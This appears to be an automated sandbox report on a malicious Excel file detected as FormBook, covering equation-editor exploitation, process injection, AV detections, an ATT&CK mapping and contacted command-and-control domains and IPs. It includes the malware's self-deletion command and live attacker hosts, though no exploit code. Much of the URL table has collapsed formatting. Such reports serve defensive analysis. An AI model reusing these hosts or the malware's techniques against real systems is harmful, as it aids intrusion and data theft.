          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: C20000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2151792778.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Native API (1); Shared Modules (1); Exploitation for Client Execution (13); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Process Injection (512); Extra Window Memory Injection (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Masquerading (111); Virtualization/Sandbox Evasion (2); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (31); Software Packing (11); Extra Window Memory Injection (1)
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (14); Network Sniffing
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel (1); Ingress Tool Transfer (14); Non-Application Layer Protocol (3); Application Layer Protocol (123); Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
          Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data
          (Numbers in parentheses are the signature counts the matrix shows as superscripts.)

          Behavior Graph

          Behavior Graph ID: 433039 | Sample: L2.xlsx | Startdate: 11/06/2021 | Architecture: WINDOWS | Score: 100

          Start: DNS www.obi4ex.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 12 other signatures
            EQNEDT32.EXE (started): network 192.210.173.40, 49165, 80 AS-COLOCROSSINGUS United States; dropped C:\Users\user\AppData\...\loader2[1].exe, PE32; dropped C:\Users\Public\vbc.exe, PE32; signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              vbc.exe (started): dropped C:\Users\user\AppData\Local\...\System.dll, PE32; signatures: Multi AV Scanner detection for dropped file, Detected unpacking (changes PE section rights), Machine Learning detection for dropped file, 2 other signatures
                vbc.exe (started): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection)
                  explorer.exe (injected): network www.meganfantastic.com 45.195.169.197, 49167, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles; www.alberthospice.com 154.84.76.49, 49166, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles; 2 other IPs or domains; signatures: System process connects to network (likely due to code injection or exploit), Performs DNS queries to domains with low reputation
                    control.exe (started): DNS www.adultvideolife.xyz; signatures: Performs DNS queries to domains with low reputation, Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements
                      cmd.exe (started)
            EXCEL.EXE (started): dropped C:\Users\user\Desktop\~$L2.xlsx, data

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          L2.xlsx | 30% | Virustotal |
          L2.xlsx | 26% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe | 23% | Metadefender |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe | 41% | ReversingLabs | Win32.Backdoor.Mokes
          C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll | 0% | ReversingLabs |
          C:\Users\Public\vbc.exe | 23% | Metadefender |
          C:\Users\Public\vbc.exe | 41% | ReversingLabs | Win32.Backdoor.Mokes

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.2.vbc.exe.5b7268.1.unpack | 100% | Avira | TR/Dropper.Gen
          7.0.control.exe.c20000.0.unpack | 100% | Avira | TR/Dropper.Gen
          4.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          4.2.vbc.exe.510000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.control.exe.2557960.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
          4.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          5.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          7.2.control.exe.5f2210.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          5.2.vbc.exe.880000.2.unpack | 100% | Avira | TR/Dropper.Gen
          5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.control.exe.c20000.1.unpack | 100% | Avira | TR/Dropper.Gen

          Domains

          Source | Detection | Scanner | Label
          www.alberthospice.com | 1% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
          http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
          http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
          http://%s.com | 0% | URL Reputation | safe
          http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
          http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
          http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
          http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
          http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
          http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
          http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
          http://buscar.ozu.es/ | 0% | URL Reputation | safe
          http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
          http://search.auction.co.kr/ | 0% | URL Reputation | safe
          http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
          http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
          http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
          http://google.pchome.com.tw/ | 0% | URL Reputation | safe
          http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
          http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
          http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
          http://searchresults.news.com.au/ | 0% | URL Reputation | safe
          http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
          http://search.yahoo.co.jp | 0% | URL Reputation | safe
          www.alberthospice.com/sh2m/ | 0% | Avira URL Cloud | safe
          http://buscador.terra.es/ | 0% | URL Reputation | safe
          http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
          http://www.iask.com/ | 0% | URL Reputation | safe
          http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
          http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
          http://p.zhongsou.com/favicon.ico | 0% | URL Reputation | safe
          http://service2.bfast.com/ | 0% | URL Reputation | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.news.com.au/favicon.ico | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.alberthospice.com | 154.84.76.49 | true | true | | unknown
          www.meganfantastic.com | 45.195.169.197 | true | true | | unknown
          www.adultvideolife.xyz | 127.0.0.1 | true | true | | unknown
          www.sciencebasedmasks.com | unknown | unknown | true | | unknown
          www.obi4ex.com | unknown | unknown | true | | unknown

                  Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.alberthospice.com/sh2m/ | true | Avira URL Cloud: safe | low

                  URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://search.chol.com/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://www.mercadolivre.com.br/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
          http://search.ebay.de/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://www.mtv.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://www.rambler.ru/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://www.nifty.com/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://www.dailymail.co.uk/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www3.fnac.com/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://buscar.ya.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://search.yahoo.com/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sogou.com/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://asp.usatoday.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://fr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://rover.ebay.com | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://in.search.yahoo.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://search.ebay.in/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
          http://%s.com | explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
          http://msk.afisha.ru/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
          http://search.rediff.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
          http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp | false | |
                                                      high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://search.naver.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://www.google.ru/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://search.daum.net/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://buscar.ozu.es/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.about.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://www.ask.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.cjmall.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.centrum.cz/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://suche.t-online.de/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.google.it/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.auction.co.kr/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.ceneo.pl/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.amazon.de/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmpfalse
                                                                                          high
                                                                                          http://sads.myspace.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://search.sify.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://search.ebay.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.nifty.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.google.si/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.google.cz/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.soso.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.univision.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://investor.msn.com/ | explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp | false | | high
http://search.espn.go.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.myspace.com/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.centrum.cz/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://p.zhongsou.com/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://service2.bfast.com/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
